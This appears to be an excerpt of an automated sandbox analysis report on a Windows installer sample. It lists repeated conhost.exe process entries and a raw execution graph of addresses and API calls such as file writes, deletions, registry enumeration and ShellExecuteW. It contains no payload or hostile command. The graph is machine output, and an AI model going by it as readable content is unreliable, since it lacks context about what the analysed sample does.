                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:243
                                        Start time:14:01:49
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:330
                                        Start time:14:02:09
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:342
                                        Start time:14:02:12
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:348
                                        Start time:14:02:14
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:390
                                        Start time:14:02:22
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:414
                                        Start time:14:02:26
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:429
                                        Start time:14:02:30
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:456
                                        Start time:14:02:34
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:489
                                        Start time:14:02:40
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false


                                          Execution Graph

                                          Execution Coverage:17.8%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:20.7%
                                          Total number of Nodes:1526
                                          Total number of Limit Nodes:32
403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4027 406a99 lstrcpyW 
3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f 
PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3964 406009 lstrcpynW 3820->3964 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3914 40160c 3834->3914 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 
3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3914 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3947 40145c 3842->3947 3859 40145c 18 API calls 3843->3859 3941 401446 3844->3941 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3914 3847->3914 3963 405f51 wsprintfW 3847->3963 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3914 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3914 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3914 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3914 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3914 3879 4062a3 11 API calls 3868->3879 3869->3914 3870->3914 3871->3914 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3959 4062d5 FindFirstFileW 3874->3959 3885 40197f 3875->3885 3927 4019a1 3875->3927 3877 40169a 3944 4062a3 lstrlenW wvsprintfW 3877->3944 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3909 4062d5 2 API calls 3885->3909 3885->3927 3886 4062a3 11 API calls 3894 4017c9 3886->3894 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3914 3907 404f72 25 API calls 3892->3907 3952 405d59 CharNextW CharNextW 3894->3952 3896 4019b8 GetShortPathNameW 3896->3914 3905 4018f5 3897->3905 3898->3914 3899->3914 3906 4062a3 11 API calls 3900->3906 
3901 4018c2 3910 4062a3 11 API calls 3901->3910 3902 4018a9 3908 4062a3 11 API calls 3902->3908 3912 4062a3 11 API calls 3905->3912 3906->3914 3907->3914 3908->3914 3913 401991 3909->3913 3910->3914 3911 4017d4 3915 401864 3911->3915 3918 405d06 CharNextW 3911->3918 3936 4062a3 11 API calls 3911->3936 3916 401902 MoveFileW 3912->3916 3913->3927 3962 406009 lstrcpynW 3913->3962 3914->3832 3915->3892 3917 40186e 3915->3917 3919 401912 3916->3919 3920 40191e 3916->3920 3921 404f72 25 API calls 3917->3921 3923 4017e6 CreateDirectoryW 3918->3923 3919->3892 3925 401942 3920->3925 3930 4062d5 2 API calls 3920->3930 3926 401875 3921->3926 3923->3911 3924 4017fe GetLastError 3923->3924 3928 401827 GetFileAttributesW 3924->3928 3929 40180b GetLastError 3924->3929 3935 4062a3 11 API calls 3925->3935 3958 406009 lstrcpynW 3926->3958 3927->3896 3927->3914 3928->3911 3932 4062a3 11 API calls 3929->3932 3933 401929 3930->3933 3932->3911 3933->3925 3938 406c68 42 API calls 3933->3938 3934 401882 SetCurrentDirectoryW 3934->3914 3937 40195c 3935->3937 3936->3911 3937->3914 3939 401936 3938->3939 3940 404f72 25 API calls 3939->3940 3940->3925 3942 406805 18 API calls 3941->3942 3943 401455 3942->3943 3943->3877 3945 4060e7 9 API calls 3944->3945 3946 4016a7 Sleep 3945->3946 3946->3914 3948 406805 18 API calls 3947->3948 3949 401488 3948->3949 3950 401497 3949->3950 3951 406038 5 API calls 3949->3951 3950->3886 3951->3950 3953 405d76 3952->3953 3956 405d88 3952->3956 3955 405d83 CharNextW 3953->3955 3953->3956 3954 405dac 3954->3911 3955->3954 3956->3954 3957 405d06 CharNextW 3956->3957 3957->3956 3958->3934 3960 4018a5 3959->3960 3961 4062eb FindClose 3959->3961 3960->3901 3960->3902 3961->3960 3962->3927 3963->3914 3964->3822 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 3971->3973 4013 
403882 CoUninitialize 3972->4013 3974 406e4b 3973->3974 4017 406009 lstrcpynW 3973->4017 3980 4062d5 2 API calls 3974->3980 4002 406e58 3974->4002 3974->4013 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3984 406d19 3979->3984 3982 406e64 3980->3982 3981->3979 3987 406722 3 API calls 3982->3987 3982->4013 3986 406d2b lstrlenW FindFirstFileW 3983->3986 3984->3983 3984->3986 3985 4062a3 11 API calls 3985->4013 3988 406e3b 3986->3988 3992 406d52 3986->3992 3989 406e6e 3987->3989 3988->3974 3991 4062a3 11 API calls 3989->3991 3990 405d06 CharNextW 3990->3992 3993 406e79 3991->3993 3992->3990 3996 406e18 FindNextFileW 3992->3996 4005 406c9b 72 API calls 3992->4005 4012 404f72 25 API calls 3992->4012 4014 4062a3 11 API calls 3992->4014 4015 404f72 25 API calls 3992->4015 4016 406c68 42 API calls 3992->4016 4018 406009 lstrcpynW 3992->4018 4019 405e30 GetFileAttributesW 3992->4019 3994 405e30 2 API calls 3993->3994 3995 406e81 RemoveDirectoryW 3994->3995 3999 406ec4 3995->3999 4000 406e8d 3995->4000 3996->3992 3998 406e30 FindClose 3996->3998 3998->3988 4001 404f72 25 API calls 3999->4001 4000->4002 4003 406e93 4000->4003 4001->4013 4002->3985 4004 4062a3 11 API calls 4003->4004 4006 406e9d 4004->4006 4005->3992 4008 404f72 25 API calls 4006->4008 4010 406ea7 4008->4010 4011 406c68 42 API calls 4010->4011 4011->4013 4012->3996 4013->3491 4013->3492 4014->3992 4015->3992 4016->3992 4017->3976 4018->3992 4020 405e4d DeleteFileW 4019->4020 4021 405e3f SetFileAttributesW 4019->4021 4020->3992 4021->4020 4022->3653 4023->3677 4024->3696 4025->3696 4026->3685 4028 406ae7 GetShortPathNameW 4027->4028 4029 406abe 4027->4029 4030 406b00 4028->4030 4031 406c62 4028->4031 4053 405e50 GetFileAttributesW CreateFileW 4029->4053 4030->4031 4033 406b08 WideCharToMultiByte 4030->4033 4031->3706 4033->4031 4035 406b25 WideCharToMultiByte 4033->4035 4034 406ac7 CloseHandle 
GetShortPathNameW 4034->4031 4036 406adf 4034->4036 4035->4031 4037 406b3d wsprintfA 4035->4037 4036->4028 4036->4031 4038 406805 18 API calls 4037->4038 4039 406b69 4038->4039 4054 405e50 GetFileAttributesW CreateFileW 4039->4054 4041 406b76 4041->4031 4042 406b83 GetFileSize GlobalAlloc 4041->4042 4043 406ba4 ReadFile 4042->4043 4044 406c58 CloseHandle 4042->4044 4043->4044 4045 406bbe 4043->4045 4044->4031 4045->4044 4055 405db6 lstrlenA 4045->4055 4048 406bd7 lstrcpyA 4051 406bf9 4048->4051 4049 406beb 4050 405db6 4 API calls 4049->4050 4050->4051 4052 406c30 SetFilePointer WriteFile GlobalFree 4051->4052 4052->4044 4053->4034 4054->4041 4056 405df7 lstrlenA 4055->4056 4057 405dd0 lstrcmpiA 4056->4057 4058 405dff 4056->4058 4057->4058 4059 405dee CharNextA 4057->4059 4058->4048 4058->4049 4059->4056 4940 402a84 4941 401553 19 API calls 4940->4941 4942 402a8e 4941->4942 4943 401446 18 API calls 4942->4943 4944 402a98 4943->4944 4945 401a13 4944->4945 4946 402ab2 RegEnumKeyW 4944->4946 4947 402abe RegEnumValueW 4944->4947 4948 402a7e 4946->4948 4947->4945 4947->4948 4948->4945 4949 4029e4 RegCloseKey 4948->4949 4949->4945 4950 402c8a 4951 402ca2 4950->4951 4952 402c8f 4950->4952 4954 40145c 18 API calls 4951->4954 4953 401446 18 API calls 4952->4953 4956 402c97 4953->4956 4955 402ca9 lstrlenW 4954->4955 4955->4956 4957 402ccb WriteFile 4956->4957 4958 401a13 4956->4958 4957->4958 4959 40400d 4960 40406a 4959->4960 4961 40401a lstrcpynA lstrlenA 4959->4961 4961->4960 4962 40404b 4961->4962 4962->4960 4963 404057 GlobalFree 4962->4963 4963->4960 4964 401d8e 4965 40145c 18 API calls 4964->4965 4966 401d95 ExpandEnvironmentStringsW 4965->4966 4967 401da8 4966->4967 4969 401db9 4966->4969 4968 401dad lstrcmpW 4967->4968 4967->4969 4968->4969 4970 401e0f 4971 401446 18 API calls 4970->4971 4972 401e17 4971->4972 4973 401446 18 API calls 4972->4973 4974 401e21 4973->4974 4975 4030e3 4974->4975 4977 405f51 wsprintfW 4974->4977 4977->4975 4978 402392 4979 40145c 18 API 
calls 4978->4979 4980 402399 4979->4980 4983 4071f8 4980->4983 4984 406ed2 25 API calls 4983->4984 4985 407218 4984->4985 4986 407222 lstrcpynW lstrcmpW 4985->4986 4987 4023a7 4985->4987 4988 407254 4986->4988 4989 40725a lstrcpynW 4986->4989 4988->4989 4989->4987 4060 402713 4075 406009 lstrcpynW 4060->4075 4062 40272c 4076 406009 lstrcpynW 4062->4076 4064 402738 4065 40145c 18 API calls 4064->4065 4067 402743 4064->4067 4065->4067 4066 402752 4069 40145c 18 API calls 4066->4069 4071 402761 4066->4071 4067->4066 4068 40145c 18 API calls 4067->4068 4068->4066 4069->4071 4070 40145c 18 API calls 4072 40276b 4070->4072 4071->4070 4073 4062a3 11 API calls 4072->4073 4074 40277f WritePrivateProfileStringW 4073->4074 4075->4062 4076->4064 4990 402797 4991 40145c 18 API calls 4990->4991 4992 4027ae 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027b7 4993->4994 4995 40145c 18 API calls 4994->4995 4996 4027c0 GetPrivateProfileStringW lstrcmpW 4995->4996 4997 402e18 4998 40145c 18 API calls 4997->4998 4999 402e1f FindFirstFileW 4998->4999 5000 402e32 4999->5000 5005 405f51 wsprintfW 5000->5005 5002 402e43 5006 406009 lstrcpynW 5002->5006 5004 402e50 5005->5002 5006->5004 5007 401e9a 5008 40145c 18 API calls 5007->5008 5009 401ea1 5008->5009 5010 401446 18 API calls 5009->5010 5011 401eab wsprintfW 5010->5011 4287 401a1f 4288 40145c 18 API calls 4287->4288 4289 401a26 4288->4289 4290 4062a3 11 API calls 4289->4290 4291 401a49 4290->4291 4292 401a64 4291->4292 4293 401a5c 4291->4293 4341 406009 lstrcpynW 4292->4341 4340 406009 lstrcpynW 4293->4340 4296 401a62 4300 406038 5 API calls 4296->4300 4297 401a6f 4298 406722 3 API calls 4297->4298 4299 401a75 lstrcatW 4298->4299 4299->4296 4302 401a81 4300->4302 4301 4062d5 2 API calls 4301->4302 4302->4301 4303 405e30 2 API calls 4302->4303 4305 401a98 CompareFileTime 4302->4305 4306 401ba9 4302->4306 4310 4062a3 11 API calls 4302->4310 4314 406009 lstrcpynW 4302->4314 4320 406805 18 API calls 4302->4320 4327 405ca0 
MessageBoxIndirectW 4302->4327 4331 401b50 4302->4331 4338 401b5d 4302->4338 4339 405e50 GetFileAttributesW CreateFileW 4302->4339 4303->4302 4305->4302 4307 404f72 25 API calls 4306->4307 4309 401bb3 4307->4309 4308 404f72 25 API calls 4311 401b70 4308->4311 4312 40337f 37 API calls 4309->4312 4310->4302 4315 4062a3 11 API calls 4311->4315 4313 401bc6 4312->4313 4316 4062a3 11 API calls 4313->4316 4314->4302 4322 401b8b 4315->4322 4317 401bda 4316->4317 4318 401be9 SetFileTime 4317->4318 4319 401bf8 CloseHandle 4317->4319 4318->4319 4321 401c09 4319->4321 4319->4322 4320->4302 4323 401c21 4321->4323 4324 401c0e 4321->4324 4326 406805 18 API calls 4323->4326 4325 406805 18 API calls 4324->4325 4328 401c16 lstrcatW 4325->4328 4329 401c29 4326->4329 4327->4302 4328->4329 4330 4062a3 11 API calls 4329->4330 4332 401c34 4330->4332 4333 401b93 4331->4333 4334 401b53 4331->4334 4335 405ca0 MessageBoxIndirectW 4332->4335 4336 4062a3 11 API calls 4333->4336 4337 4062a3 11 API calls 4334->4337 4335->4322 4336->4322 4337->4338 4338->4308 4339->4302 4340->4296 4341->4297 5012 40209f GetDlgItem GetClientRect 5013 40145c 18 API calls 5012->5013 5014 4020cf LoadImageW SendMessageW 5013->5014 5015 4030e3 5014->5015 5016 4020ed DeleteObject 5014->5016 5016->5015 5017 402b9f 5018 401446 18 API calls 5017->5018 5023 402ba7 5018->5023 5019 402c4a 5020 402bdf ReadFile 5022 402c3d 5020->5022 5020->5023 5021 401446 18 API calls 5021->5022 5022->5019 5022->5021 5029 402d17 ReadFile 5022->5029 5023->5019 5023->5020 5023->5022 5024 402c06 MultiByteToWideChar 5023->5024 5025 402c3f 5023->5025 5027 402c4f 5023->5027 5024->5023 5024->5027 5030 405f51 wsprintfW 5025->5030 5027->5022 5028 402c6b SetFilePointer 5027->5028 5028->5022 5029->5022 5030->5019 5031 402b23 GlobalAlloc 5032 402b39 5031->5032 5033 402b4b 5031->5033 5034 401446 18 API calls 5032->5034 5035 40145c 18 API calls 5033->5035 5036 402b41 5034->5036 5037 402b52 WideCharToMultiByte lstrlenA 5035->5037 5038 402b93 5036->5038 5039 
402b84 WriteFile 5036->5039 5037->5036 5039->5038 5040 402384 GlobalFree 5039->5040 5040->5038 5042 4044a5 5043 404512 5042->5043 5044 4044df 5042->5044 5046 40451f GetDlgItem GetAsyncKeyState 5043->5046 5053 4045b1 5043->5053 5110 405c84 GetDlgItemTextW 5044->5110 5049 40453e GetDlgItem 5046->5049 5056 40455c 5046->5056 5047 4044ea 5050 406038 5 API calls 5047->5050 5048 40469d 5108 404833 5048->5108 5112 405c84 GetDlgItemTextW 5048->5112 5051 403d3f 19 API calls 5049->5051 5052 4044f0 5050->5052 5055 404551 ShowWindow 5051->5055 5058 403e74 5 API calls 5052->5058 5053->5048 5059 406805 18 API calls 5053->5059 5053->5108 5055->5056 5061 404579 SetWindowTextW 5056->5061 5066 405d59 4 API calls 5056->5066 5057 403dca 8 API calls 5062 404847 5057->5062 5063 4044f5 GetDlgItem 5058->5063 5064 40462f SHBrowseForFolderW 5059->5064 5060 4046c9 5065 40677e 18 API calls 5060->5065 5067 403d3f 19 API calls 5061->5067 5068 404503 IsDlgButtonChecked 5063->5068 5063->5108 5064->5048 5069 404647 CoTaskMemFree 5064->5069 5070 4046cf 5065->5070 5071 40456f 5066->5071 5072 404597 5067->5072 5068->5043 5073 406722 3 API calls 5069->5073 5113 406009 lstrcpynW 5070->5113 5071->5061 5077 406722 3 API calls 5071->5077 5074 403d3f 19 API calls 5072->5074 5075 404654 5073->5075 5078 4045a2 5074->5078 5079 40468b SetDlgItemTextW 5075->5079 5084 406805 18 API calls 5075->5084 5077->5061 5111 403d98 SendMessageW 5078->5111 5079->5048 5080 4046e6 5082 4062fc 3 API calls 5080->5082 5091 4046ee 5082->5091 5083 4045aa 5087 4062fc 3 API calls 5083->5087 5085 404673 lstrcmpiW 5084->5085 5085->5079 5088 404684 lstrcatW 5085->5088 5086 404730 5114 406009 lstrcpynW 5086->5114 5087->5053 5088->5079 5090 404739 5092 405d59 4 API calls 5090->5092 5091->5086 5096 406751 2 API calls 5091->5096 5097 404785 5091->5097 5093 40473f GetDiskFreeSpaceW 5092->5093 5095 404763 MulDiv 5093->5095 5093->5097 5095->5097 5096->5091 5099 4047e2 5097->5099 5100 4043ad 21 API calls 5097->5100 5098 404805 5115 403d85 
KiUserCallbackDispatcher 5098->5115 5099->5098 5101 40141d 80 API calls 5099->5101 5102 4047d3 5100->5102 5101->5098 5104 4047e4 SetDlgItemTextW 5102->5104 5105 4047d8 5102->5105 5104->5099 5106 4043ad 21 API calls 5105->5106 5106->5099 5107 404821 5107->5108 5116 403d61 5107->5116 5108->5057 5110->5047 5111->5083 5112->5060 5113->5080 5114->5090 5115->5107 5117 403d74 SendMessageW 5116->5117 5118 403d6f 5116->5118 5117->5108 5118->5117 5119 402da5 5120 4030e3 5119->5120 5121 402dac 5119->5121 5122 401446 18 API calls 5121->5122 5123 402db8 5122->5123 5124 402dbf SetFilePointer 5123->5124 5124->5120 5125 402dcf 5124->5125 5125->5120 5127 405f51 wsprintfW 5125->5127 5127->5120 5128 4030a9 SendMessageW 5129 4030c2 InvalidateRect 5128->5129 5130 4030e3 5128->5130 5129->5130 5131 401cb2 5132 40145c 18 API calls 5131->5132 5133 401c54 5132->5133 5134 4062a3 11 API calls 5133->5134 5137 401c64 5133->5137 5135 401c59 5134->5135 5136 406c9b 81 API calls 5135->5136 5136->5137 4087 4021b5 4088 40145c 18 API calls 4087->4088 4089 4021bb 4088->4089 4090 40145c 18 API calls 4089->4090 4091 4021c4 4090->4091 4092 40145c 18 API calls 4091->4092 4093 4021cd 4092->4093 4094 40145c 18 API calls 4093->4094 4095 4021d6 4094->4095 4096 404f72 25 API calls 4095->4096 4097 4021e2 ShellExecuteW 4096->4097 4098 40221b 4097->4098 4099 40220d 4097->4099 4101 4062a3 11 API calls 4098->4101 4100 4062a3 11 API calls 4099->4100 4100->4098 4102 402230 4101->4102 5145 402238 5146 40145c 18 API calls 5145->5146 5147 40223e 5146->5147 5148 4062a3 11 API calls 5147->5148 5149 40224b 5148->5149 5150 404f72 25 API calls 5149->5150 5151 402255 5150->5151 5152 405c3f 2 API calls 5151->5152 5153 40225b 5152->5153 5154 4062a3 11 API calls 5153->5154 5157 4022ac CloseHandle 5153->5157 5160 40226d 5154->5160 5156 4030e3 5157->5156 5158 402283 WaitForSingleObject 5159 402291 GetExitCodeProcess 5158->5159 5158->5160 5159->5157 5162 4022a3 5159->5162 5160->5157 5160->5158 5161 406332 2 API calls 5160->5161 
